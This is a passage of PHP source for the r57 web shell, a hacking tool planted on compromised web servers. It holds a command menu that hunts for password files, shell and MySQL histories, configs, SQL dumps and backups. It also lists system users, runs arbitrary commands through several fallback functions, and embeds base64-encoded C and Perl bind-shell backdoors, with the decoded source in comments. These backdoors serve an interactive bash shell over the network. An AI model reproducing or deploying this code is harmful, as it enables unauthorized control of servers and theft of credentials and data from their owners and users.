  2252. 'find all writable directories in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type d -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
  2253.  
  2254. 'find all writable directories and files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
  2255.  
  2256. 'find all writable directories and files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
  2257.  
  2258. 'find all .htpasswd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .htpasswd  >> /tmp/grep.txt;cat /tmp/grep.txt',
  2259.  
  2260. 'find all .bash_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .bash_history  >> /tmp/grep.txt;cat /tmp/grep.txt',
  2261.  
  2262. 'find all .mysql_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .mysql_history  >> /tmp/grep.txt;cat /tmp/grep.txt',
  2263.  
  2264. 'find all .fetchmailrc files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .fetchmailrc  >> /tmp/grep.txt;cat /tmp/grep.txt',
  2265.  
  2266. 'find httpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name httpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
  2267.  
  2268. 'find vhosts.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name vhosts.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
  2269.  
  2270. 'find proftpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name proftpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
  2271.  
  2272. 'find admin.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name admin.php >> /tmp/grep.txt;cat /tmp/grep.txt',
  2273.  
  2274. 'find config* files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "config*"  >> /tmp/grep.txt;cat /tmp/grep.txt',
  2275.  
  2276. 'find cfg.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name cfg.php >> /tmp/grep.txt;cat /tmp/grep.txt',
  2277.  
  2278. 'find conf.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name conf.php >> /tmp/grep.txt;cat /tmp/grep.txt',
  2279.  
  2280. 'find config.dat files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.dat >> /tmp/grep.txt;cat /tmp/grep.txt',
  2281.  
  2282. 'find config.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.php >> /tmp/grep.txt;cat /tmp/grep.txt',
  2283.  
  2284. 'find config.inc files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.inc >> /tmp/grep.txt;cat /tmp/grep.txt',
  2285.  
  2286. 'find config.inc.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.inc.php >> /tmp/grep.txt;cat /tmp/grep.txt',
  2287.  
  2288. 'find config.default.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.default.php >> /tmp/grep.txt;cat /tmp/grep.txt',
  2289.  
  2290. 'find *.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*.conf" >> /tmp/grep.txt;cat /tmp/grep.txt',
  2291.  
  2292. 'find *.pwd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*.pwd" >> /tmp/grep.txt;cat /tmp/grep.txt',
  2293.  
  2294. 'find *.sql files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*.sql" >> /tmp/grep.txt;cat /tmp/grep.txt',
  2295.  
  2296. 'find *backup* files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*backup*" >> /tmp/grep.txt;cat /tmp/grep.txt',
  2297.  
  2298. 'find *dump* files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*dump*" >> /tmp/grep.txt;cat /tmp/grep.txt',
  2299.  
  2300. '-----------------------------------'=>'',
  2301.  
  2302. 'find /var/ access_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name access_log >> /tmp/grep.txt;cat /tmp/grep.txt',
  2303.  
  2304. 'find /var/ error_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name error_log >> /tmp/grep.txt;cat /tmp/grep.txt',
  2305.  
  2306. 'find /var/ access.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name access.log >> /tmp/grep.txt;cat /tmp/grep.txt',
  2307.  
  2308. 'find /var/ error.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name error.log >> /tmp/grep.txt;cat /tmp/grep.txt',
  2309.  
  2310. 'find /var/ "*.log" files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name "*.log" >> /tmp/grep.txt;cat /tmp/grep.txt',
  2311.  
  2312. '----------------------------------------------------------------------------------------------------'=>'ls -la'
  2313.  
  2314. );
  2315.  
  2316. $table_up1  = "<tr><td bgcolor=#333333><font face=Verdana size=-2><b><div align=center>:: ";
  2317.  
  2318. $table_up2  = " ::</div></b></font></td></tr><tr><td>";
  2319.  
  2320. $table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333>";
  2321.  
  2322. $table_end1 = "</td></tr>";
  2323.  
  2324. $arrow = " <font face=Webdings color=gray>4</font>";
  2325.  
  2326. $lb = "<font color=green>[</font>";
  2327.  
  2328. $rb = "<font color=green>]</font>";
  2329.  
  2330. $font = "<font face=Verdana size=-2>";
  2331.  
  2332. $ts = "<table class=table1 width=100% align=center>";
  2333.  
  2334. $te = "</table>";
  2335.  
  2336. $fs = "<form name=form method=POST>";
  2337.  
  2338. $fe = "</form>";
  2339.  
  2340. if(isset($_GET['users']))
  2341.  
  2342. {
  2343.  
  2344. if(!$users=get_users('/etc/passwd')) {echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>";}
  2345.  
  2346. else
  2347.  
  2348. {
  2349.  
  2350. echo '<center>';
  2351.  
  2352. foreach($users as $user) {echo $user."<br>";}
  2353.  
  2354. echo '</center>';
  2355.  
  2356. }
  2357.  
  2358. echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";die();
  2359.  
  2360. }
  2361.  
  2362. if (!empty($_POST['dir'])) {if(@function_exists('chdir')){@chdir($_POST['dir']);}else if(@function_exists('chroot')){@chroot($_POST['dir']);};}
  2363.  
  2364. if (empty($_POST['dir'])){if(@function_exists('chdir')){$dir = @getcwd();};}else{$dir=$_POST['dir'];}
  2365.  
  2366. $unix = 0;
  2367.  
  2368. if(strlen($dir)>1 &&$dir[1]==":") $unix=0;else $unix=1;
  2369.  
  2370. if(empty($dir))
  2371.  
  2372. {
  2373.  
  2374. $os = getenv('OS');
  2375.  
  2376. if(empty($os)){$os = @php_uname();}
  2377.  
  2378. if(empty($os)){$os ="-";$unix=1;}
  2379.  
  2380. else
  2381.  
  2382. {
  2383.  
  2384. if(@eregi("^win",$os)) {$unix = 0;}
  2385.  
  2386. else {$unix = 1;}
  2387.  
  2388. }
  2389.  
  2390. }
  2391.  
  2392. if(!empty($_POST['s_dir']) &&!empty($_POST['s_text']) &&!empty($_POST['cmd']) &&$_POST['cmd'] == "search_text")
  2393.  
  2394. {
  2395.  
  2396. echo $head;
  2397.  
  2398. if(!empty($_POST['s_mask']) &&!empty($_POST['m'])) {$sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']);}
  2399.  
  2400. else {$sr = new SearchResult($_POST['s_dir'],$_POST['s_text']);}
  2401.  
  2402. $sr->SearchText(0,0);
  2403.  
  2404. $res = $sr->GetResultFiles();
  2405.  
  2406. $found = $sr->GetMatchesCount();
  2407.  
  2408. $titles = $sr->GetTitles();
  2409.  
  2410. $r = "";
  2411.  
  2412. if($found >0)
  2413.  
  2414. {
  2415.  
  2416. $r .= "<TABLE width=100%>";
  2417.  
  2418. foreach($res as $file=>$v)
  2419.  
  2420. {
  2421.  
  2422. $r .= "<TR>";
  2423.  
  2424. $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
  2425.  
  2426. $r .= (!$unix)?str_replace("/","\\",$file) : $file;
  2427.  
  2428. $r .= "</b></font></ TD>";
  2429.  
  2430. $r .= "</TR>";
  2431.  
  2432. foreach($v as $a=>$b)
  2433.  
  2434. {
  2435.  
  2436. $r .= "<TR>";
  2437.  
  2438. $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
  2439.  
  2440. $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
  2441.  
  2442. $r .= "</TR>\n";
  2443.  
  2444. }
  2445.  
  2446. }
  2447.  
  2448. $r .= "</TABLE>";
  2449.  
  2450. echo $r;
  2451.  
  2452. }
  2453.  
  2454. else
  2455.  
  2456. {
  2457.  
  2458. echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
  2459.  
  2460. }
  2461.  
  2462. echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
  2463.  
  2464. die();
  2465.  
  2466. }
  2467.  
  2468. if(!$safe_mode &&strpos(ex("echo abcr57"),"r57")!=3) {$safe_mode = 1;}
  2469.  
  2470. $SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
  2471.  
  2472. if(empty($SERVER_SOFTWARE)){$SERVER_SOFTWARE = "-";}
  2473.  
  2474. function ws($i)
  2475.  
  2476. {
  2477.  
  2478. return @str_repeat("&nbsp;",$i);
  2479.  
  2480. }
  2481.  
  2482. function ex($cfe)
  2483.  
  2484. {
  2485.  
  2486. $res = '';
  2487.  
  2488. if (!empty($cfe))
  2489.  
  2490. {
  2491.  
  2492. if(@function_exists('exec'))
  2493.  
  2494. {
  2495.  
  2496. @exec($cfe,$res);
  2497.  
  2498. $res = join("\n",$res);
  2499.  
  2500. }
  2501.  
  2502. elseif(@function_exists('shell_exec'))
  2503.  
  2504. {
  2505.  
  2506. $res = @shell_exec($cfe);
  2507.  
  2508. }
  2509.  
  2510. elseif(@function_exists('system'))
  2511.  
  2512. {
  2513.  
  2514. @ob_start();
  2515.  
  2516. @system($cfe);
  2517.  
  2518. $res = @ob_get_contents();
  2519.  
  2520. @ob_end_clean();
  2521.  
  2522. }
  2523.  
  2524. elseif(@function_exists('passthru'))
  2525.  
  2526. {
  2527.  
  2528. @ob_start();
  2529.  
  2530. @passthru($cfe);
  2531.  
  2532. $res = @ob_get_contents();
  2533.  
  2534. @ob_end_clean();
  2535.  
  2536. }
  2537.  
  2538. elseif(@is_resource($f = @popen($cfe,"r")))
  2539.  
  2540. {
  2541.  
  2542. $res = "";
  2543.  
  2544. if(@function_exists('fread') &&@function_exists('feof')){
  2545.  
  2546. while(!@feof($f)) {$res .= @fread($f,1024);}
  2547.  
  2548. }else if(@function_exists('fgets') &&@function_exists('feof')){
  2549.  
  2550. while(!@feof($f)) {$res .= @fgets($f,1024);}
  2551.  
  2552. }
  2553.  
  2554. @pclose($f);
  2555.  
  2556. }
  2557.  
  2558. elseif(@is_resource($f = @proc_open($cfe,array(1 =>array("pipe","w")),$pipes)))
  2559.  
  2560. {
  2561.  
  2562. $res = "";
  2563.  
  2564. if(@function_exists('fread') &&@function_exists('feof')){
  2565.  
  2566. while(!@feof($pipes[1])) {$res .= @fread($pipes[1],1024);}
  2567.  
  2568. }else if(@function_exists('fgets') &&@function_exists('feof')){
  2569.  
  2570. while(!@feof($pipes[1])) {$res .= @fgets($pipes[1],1024);}
  2571.  
  2572. }
  2573.  
  2574. @proc_close($f);
  2575.  
  2576. }
  2577.  
  2578. elseif(@function_exists('pcntl_exec')&&@function_exists('pcntl_fork'))
  2579.  
  2580. {
  2581.  
  2582. $res = '[~] Blind Command Execution via [pcntl_exec]\n\n';
  2583.  
  2584. $pid = @pcntl_fork();
  2585.  
  2586. if ($pid == -1) {
  2587.  
  2588. $res .= '[-] Could not children fork. Exit';
  2589.  
  2590. }else if ($pid) {
  2591.  
  2592. if (@pcntl_wifexited($status)){$res .= '[+] Done! Command "'.$cfe.'" successfully executed.';}
  2593.  
  2594. else {$res .= '[-] Error. Command incorrect.';}
  2595.  
  2596. }else {
  2597.  
  2598. $cfe = array(" -e 'system(\"$cfe\")'");
  2599.  
  2600. if(@pcntl_exec('/usr/bin/perl',$cfe)) exit(0);
  2601.  
  2602. if(@pcntl_exec('/usr/local/bin/perl',$cfe)) exit(0);
  2603.  
  2604. die();
  2605.  
  2606. }
  2607.  
  2608. }
  2609.  
  2610. }
  2611.  
  2612. return $res;
  2613.  
  2614. }
  2615.  
  2616. function get_users($filename)
  2617.  
  2618. {
  2619.  
  2620. $users = array();
  2621.  
  2622. $rows=@explode("\n",readzlib($filename));
  2623.  
  2624. if(!$rows) return 0;
  2625.  
  2626. foreach ($rows as $string)
  2627.  
  2628. {
  2629.  
  2630. $user = @explode(":",trim($string));
  2631.  
  2632. if(substr($string,0,1)!='#') array_push($users,$user[0]);
  2633.  
  2634. }
  2635.  
  2636. return $users;
  2637.  
  2638. }
  2639.  
  2640. function err($n,$txt='')
  2641.  
  2642. {
  2643.  
  2644. echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>';
  2645.  
  2646. echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
  2647.  
  2648. if(!empty($txt)) {echo " $txt";}
  2649.  
  2650. echo '</b></div></font></td></tr></table>';
  2651.  
  2652. return null;
  2653.  
  2654. }
  2655.  
  2656. function perms($mode)
  2657.  
  2658. {
  2659.  
  2660. if (!$GLOBALS['unix']) return 0;
  2661.  
  2662. if( $mode &0x1000 ) {$type='p';}
  2663.  
  2664. else if( $mode &0x2000 ) {$type='c';}
  2665.  
  2666. else if( $mode &0x4000 ) {$type='d';}
  2667.  
  2668. else if( $mode &0x6000 ) {$type='b';}
  2669.  
  2670. else if( $mode &0x8000 ) {$type='-';}
  2671.  
  2672. else if( $mode &0xA000 ) {$type='l';}
  2673.  
  2674. else if( $mode &0xC000 ) {$type='s';}
  2675.  
  2676. else $type='u';
  2677.  
  2678. $owner["read"] = ($mode &00400) ?'r': '-';
  2679.  
  2680. $owner["write"] = ($mode &00200) ?'w': '-';
  2681.  
  2682. $owner["execute"] = ($mode &00100) ?'x': '-';
  2683.  
  2684. $group["read"] = ($mode &00040) ?'r': '-';
  2685.  
  2686. $group["write"] = ($mode &00020) ?'w': '-';
  2687.  
  2688. $group["execute"] = ($mode &00010) ?'x': '-';
  2689.  
  2690. $world["read"] = ($mode &00004) ?'r': '-';
  2691.  
  2692. $world["write"] = ($mode &00002) ?'w': '-';
  2693.  
  2694. $world["execute"] = ($mode &00001) ?'x': '-';
  2695.  
  2696. if( $mode &0x800 ) $owner["execute"] = ($owner['execute']=='x') ?'s': 'S';
  2697.  
  2698. if( $mode &0x400 ) $group["execute"] = ($group['execute']=='x') ?'s': 'S';
  2699.  
  2700. if( $mode &0x200 ) $world["execute"] = ($world['execute']=='x') ?'t': 'T';
  2701.  
  2702. $s=sprintf("%1s",$type);
  2703.  
  2704. $s.=sprintf("%1s%1s%1s",$owner['read'],$owner['write'],$owner['execute']);
  2705.  
  2706. $s.=sprintf("%1s%1s%1s",$group['read'],$group['write'],$group['execute']);
  2707.  
  2708. $s.=sprintf("%1s%1s%1s",$world['read'],$world['write'],$world['execute']);
  2709.  
  2710. return trim($s);
  2711.  
  2712. }
  2713.  
  2714. function in($type,$name,$size,$value,$checked=0)
  2715.  
  2716. {
  2717.  
  2718. $ret = "<input type=".$type." name=".$name." ";
  2719.  
  2720. if($size != 0) {$ret .= "size=".$size." ";}
  2721.  
  2722. $ret .= "value=\"".$value."\"";
  2723.  
  2724. if($checked) $ret .= " checked";
  2725.  
  2726. return $ret.">";
  2727.  
  2728. }
  2729.  
  2730. function which($pr)
  2731.  
  2732. {
  2733.  
  2734. $path = '';
  2735.  
  2736. $path = ex("which $pr");
  2737.  
  2738. if(!empty($path)) {return $path;}else {return false;}
  2739.  
  2740. }
  2741.  
  2742. function cf($fname,$text)
  2743.  
  2744. {
  2745.  
  2746. $w_file=@fopen($fname,"w") or @function_exists('file_put_contents') or err(0);
  2747.  
  2748. if($w_file)
  2749.  
  2750. {
  2751.  
  2752. @fwrite($w_file,@base64_decode($text)) or @fputs($w_file,@base64_decode($text)) or @file_put_contents($fname,@base64_decode($text));
  2753.  
  2754. @fclose($w_file);
  2755.  
  2756. }
  2757.  
  2758. }
  2759.  
  2760. function sr($l,$t1,$t2)
  2761.  
  2762. {
  2763.  
  2764. return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
  2765.  
  2766. }
  2767.  
  2768. if (!@function_exists("view_size"))
  2769.  
  2770. {
  2771.  
  2772. function view_size($size)
  2773.  
  2774. {
  2775.  
  2776. if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 ." GB";}
  2777.  
  2778. elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 ." MB";}
  2779.  
  2780. elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 ." KB";}
  2781.  
  2782. else {$size = $size ." B";}
  2783.  
  2784. return $size;
  2785.  
  2786. }
  2787.  
  2788. }
  2789.  
  2790. function DirFilesR($dir,$types='')
  2791.  
  2792. {
  2793.  
  2794. $files = Array();
  2795.  
  2796. if(($handle = @opendir($dir)) ||(@function_exists('scandir')))
  2797.  
  2798. {
  2799.  
  2800. while ((false !== ($file = @readdir($handle))) &&(false !== ($file = @scandir($dir))))
  2801.  
  2802. {
  2803.  
  2804. if ($file != "."&&$file != "..")
  2805.  
  2806. {
  2807.  
  2808. if(@is_dir($dir."/".$file))
  2809.  
  2810. $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
  2811.  
  2812. else
  2813.  
  2814. {
  2815.  
  2816. $pos = @strrpos($file,".");
  2817.  
  2818. $ext = @substr($file,$pos,@strlen($file)-$pos);
  2819.  
  2820. if($types)
  2821.  
  2822. {
  2823.  
  2824. if(@in_array($ext,explode(';',$types)))
  2825.  
  2826. $files[] = $dir."/".$file;
  2827.  
  2828. }
  2829.  
  2830. else
  2831.  
  2832. $files[] = $dir."/".$file;
  2833.  
  2834. }
  2835.  
  2836. }
  2837.  
  2838. }
  2839.  
  2840. @closedir($handle);
  2841.  
  2842. }
  2843.  
  2844. return $files;
  2845.  
  2846. }
  2847.  
  2848. class SearchResult
  2849.  
  2850. {
  2851.  
  2852. var $text;
  2853.  
  2854. var $FilesToSearch;
  2855.  
  2856. var $ResultFiles;
  2857.  
  2858. var $FilesTotal;
  2859.  
  2860. var $MatchesCount;
  2861.  
  2862. var $FileMatschesCount;
  2863.  
  2864. var $TimeStart;
  2865.  
  2866. var $TimeTotal;
  2867.  
  2868. var $titles;
  2869.  
  2870. function SearchResult($dir,$text,$filter='')
  2871.  
  2872. {
  2873.  
  2874. $dirs = @explode(";",$dir);
  2875.  
  2876. $this->FilesToSearch = Array();
  2877.  
  2878. for($a=0;$a<count($dirs);$a++)
  2879.  
  2880. $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
  2881.  
  2882. $this->text = $text;
  2883.  
  2884. $this->FilesTotal = @count($this->FilesToSearch);
  2885.  
  2886. $this->TimeStart = getmicrotime();
  2887.  
  2888. $this->MatchesCount = 0;
  2889.  
  2890. $this->ResultFiles = Array();
  2891.  
  2892. $this->FileMatchesCount = Array();
  2893.  
  2894. $this->titles = Array();
  2895.  
  2896. }
  2897.  
  2898. function GetFilesTotal() {return $this->FilesTotal;}
  2899.  
  2900. function GetTitles() {return $this->titles;}
  2901.  
  2902. function GetTimeTotal() {return $this->TimeTotal;}
  2903.  
  2904. function GetMatchesCount() {return $this->MatchesCount;}
  2905.  
  2906. function GetFileMatchesCount() {return $this->FileMatchesCount;}
  2907.  
  2908. function GetResultFiles() {return $this->ResultFiles;}
  2909.  
  2910. function SearchText($phrase=0,$case=0) {
  2911.  
  2912. $qq = @explode(' ',$this->text);
  2913.  
  2914. $delim = '|';
  2915.  
  2916. if($phrase)
  2917.  
  2918. foreach($qq as $k=>$v)
  2919.  
  2920. $qq[$k] = '\b'.$v.'\b';
  2921.  
  2922. $words = '('.@implode($delim,$qq).')';
  2923.  
  2924. $pattern = "/".$words."/";
  2925.  
  2926. if(!$case)
  2927.  
  2928. $pattern .= 'i';
  2929.  
  2930. foreach($this->FilesToSearch as $k=>$filename)
  2931.  
  2932. {
  2933.  
  2934. $this->FileMatchesCount[$filename] = 0;
  2935.  
  2936. $FileStrings = @file($filename) or @next;
  2937.  
  2938. for($a=0;$a<@count($FileStrings);$a++)
  2939.  
  2940. {
  2941.  
  2942. $count = 0;
  2943.  
  2944. $CurString = $FileStrings[$a];
  2945.  
  2946. $CurString = @Trim($CurString);
  2947.  
  2948. $CurString = @strip_tags($CurString);
  2949.  
  2950. $aa = '';
  2951.  
  2952. if(($count = @preg_match_all($pattern,$CurString,$aa)))
  2953.  
  2954. {
  2955.  
  2956. $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
  2957.  
  2958. $this->ResultFiles[$filename][$a+1] = $CurString;
  2959.  
  2960. $this->MatchesCount += $count;
  2961.  
  2962. $this->FileMatchesCount[$filename] += $count;
  2963.  
  2964. }
  2965.  
  2966. }
  2967.  
  2968. }
  2969.  
  2970. $this->TimeTotal = @round(getmicrotime() -$this->TimeStart,4);
  2971.  
  2972. }
  2973.  
  2974. }
  2975.  
  2976. function getmicrotime()
  2977.  
  2978. {
  2979.  
  2980. list($usec,$sec) = @explode(" ",@microtime());
  2981.  
  2982. return ((float)$usec +(float)$sec);
  2983.  
  2984. }
  2985.  
  2986. $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
  2987.  
  2988. A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
  2989.  
  2990. GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
  2991.  
  2992. b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
  2993.  
  2994. pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
  2995.  
  2996. NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
  2997.  
  2998. ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
  2999.  
  3000. ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
  3001.  
  3002. 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
  3003.  
  3004. 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
  3005.  
  3006. 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
  3007.  
  3008. dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
  3009.  
  3010. lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
  3011.  
  3012. /* ?ST SATIRIN KIRILMI? HAL? */
  3013.  
  3014. /*
  3015.  
  3016.  
  3017.  
  3018. #include <stdio.h>
  3019.  
  3020. #include <string.h>
  3021.  
  3022. #include <sys/types.h>
  3023.  
  3024. #include <sys/socket.h>
  3025.  
  3026. #include <netinet/in.h>
  3027.  
  3028. #include <errno.h>
  3029.  
  3030. int main(argc,argv)
  3031.  
  3032. int argc;
  3033.  
  3034. char **argv;
  3035.  
  3036. {  
  3037.  
  3038.  int sockfd, newfd;
  3039.  
  3040.  char buf[30];
  3041.  
  3042.  struct sockaddr_in remote;
  3043.  
  3044.  if(fork() == 0) {
  3045.  
  3046.  remote.sin_family = AF_INET;
  3047.  
  3048.  remote.sin_port = htons(atoi(argv[1]));
  3049.  
  3050.  remote.sin_addr.s_addr = htonl(INADDR_ANY);
  3051.  
  3052.  sockfd = socket(AF_INET,SOCK_STREAM,0);
  3053.  
  3054.  if(!sockfd) perror("socket error");
  3055.  
  3056.  bind(sockfd, (struct sockaddr *)&remote, 0x10);
  3057.  
  3058.  listen(sockfd, 5);
  3059.  
  3060.  while(1)
  3061.  
  3062.   {
  3063.  
  3064.    newfd=accept(sockfd,0,0);
  3065.  
  3066.    dup2(newfd,0);
  3067.  
  3068.    dup2(newfd,1);
  3069.  
  3070.    dup2(newfd,2);
  3071.  
  3072.    write(newfd,"Password:",10);
  3073.  
  3074.    read(newfd,buf,sizeof(buf));
  3075.  
  3076.    if (!chpass(argv[2],buf))
  3077.  
  3078.    system("echo welcome to r57 shell && /bin/bash -i");
  3079.  
  3080.    else
  3081.  
  3082.    fprintf(stderr,"Sorry");
  3083.  
  3084.    close(newfd);
  3085.  
  3086.   }
  3087.  
  3088.  }
  3089.  
  3090. }
  3091.  
  3092. int chpass(char *base, char *entered) {
  3093.  
  3094. int i;
  3095.  
  3096. for(i=0;i<strlen(entered);i++)
  3097.  
  3098. {
  3099.  
  3100. if(entered[i] == '\n')
  3101.  
  3102. entered[i] = '\0';
  3103.  
  3104. if(entered[i] == '\r')
  3105.  
  3106. entered[i] = '\0';
  3107.  
  3108. }
  3109.  
  3110. if (!strcmp(base,entered))
  3111.  
  3112. return 0;
  3113.  
  3114. }
  3115.  
  3116.  
  3117.  
  3118. */
  3119.  
  3120.  
  3121.  
  3122. $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
  3123.  
  3124. VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
  3125.  
  3126. JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
  3127.  
  3128. TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
  3129.  
  3130. lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
  3131.  
  3132. Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
  3133.  
  3134. Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
  3135.  
  3136. lIENPTk47DQpleGl0IDA7DQp9DQp9";
  3137.  
  3138.  
  3139.  
  3140. /* ?ST SATIRIN KIRILMI? HAL? */
  3141.  
  3142. /*
  3143.  
  3144.  
  3145.  
  3146. #!/usr/bin/perl
  3147.  
  3148. $SHELL="/bin/bash -i";
  3149.  
  3150. if (@ARGV < 1) { exit(1); }
  3151.  
  3152. $LISTEN_PORT=$ARGV[0];
  3153.  
  3154. use Socket;
  3155.  
